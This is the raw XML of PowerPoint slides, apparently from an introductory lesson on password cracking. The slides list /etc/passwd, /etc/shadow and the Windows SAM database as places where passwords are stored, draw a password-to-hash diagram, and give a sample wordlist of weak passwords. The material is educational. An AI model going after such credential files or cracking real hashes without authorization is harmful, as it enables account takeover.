              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="1939499"/>
            <a:ext cx="2739676" cy="399393"/>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Hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA4E351-A9E8-B04D-A4E0-223D6F27CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="2585429"/>
            <a:ext cx="2758141" cy="728753"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A496BA-5F6C-E643-84B7-D982C01B4B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212577" y="2268222"/>
            <a:ext cx="693683" cy="49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086838FE-C1D3-6E48-AC0C-3C63A86BACE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3955527482"/>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074088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030E7ED3-BC2B-BE4E-8F40-2B766D479F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="2385573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where are passwords stored?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAM Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7CA5B4-80CC-C44E-ACAA-6122588012A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8383605" y="1075939"/>
            <a:ext cx="2645083" cy="383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Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C5C27B-EE6F-E74A-B465-D11F2B5D7F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368054" y="1554302"/>
            <a:ext cx="693683" cy="316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261679-C3F6-064B-BB76-F2E5FBEE2EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="1939499"/>
            <a:ext cx="2739676" cy="399393"/>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Hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA4E351-A9E8-B04D-A4E0-223D6F27CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="2585429"/>
            <a:ext cx="2758141" cy="728753"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A496BA-5F6C-E643-84B7-D982C01B4B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212577" y="2268222"/>
            <a:ext cx="693683" cy="49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E611C-7DD1-F14F-8515-679613C6594F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4472427"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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78FCCCE-6A42-B744-88DD-EBE2CFF84ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4942655"/>
            <a:ext cx="1531937" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>password1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AF286A-10F5-ED40-9688-9505E5469EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4619360"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E7EEC22-7C42-6043-9BBB-2701600D196E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4239187"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ilovedogs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="34000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E421CE-12EF-8B42-943C-D9928A742CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5265950"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pa$$w0rd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82B32F8-988C-4845-86F3-CB97DEDE18E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="5589245"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sportball3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0336E61F-96D6-8940-A0BE-582A6A3E6120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="3790792"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Wordlist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F53AE5-FCC3-1246-90D8-C044D5C7DDF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795921522"/>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757011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030E7ED3-BC2B-BE4E-8F40-2B766D479F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="2385573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where are passwords stored?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAM Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7CA5B4-80CC-C44E-ACAA-6122588012A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8383605" y="1075939"/>
            <a:ext cx="2645083" cy="383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Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C5C27B-EE6F-E74A-B465-D11F2B5D7F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368054" y="1554302"/>
            <a:ext cx="693683" cy="316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261679-C3F6-064B-BB76-F2E5FBEE2EA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="1939499"/>
            <a:ext cx="2739676" cy="399393"/>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Hashed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA4E351-A9E8-B04D-A4E0-223D6F27CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382305" y="2585429"/>
            <a:ext cx="2758141" cy="728753"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Down Arrow 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A496BA-5F6C-E643-84B7-D982C01B4B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212577" y="2268222"/>
            <a:ext cx="693683" cy="49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E611C-7DD1-F14F-8515-679613C6594F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4472427"/>
            <a:ext cx="1448858" cy="1340566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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78FCCCE-6A42-B744-88DD-EBE2CFF84ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562474" y="4942655"/>
            <a:ext cx="1531937" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>password1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AF286A-10F5-ED40-9688-9505E5469EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4560888" y="4619360"/>
            <a:ext cx="1533524" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
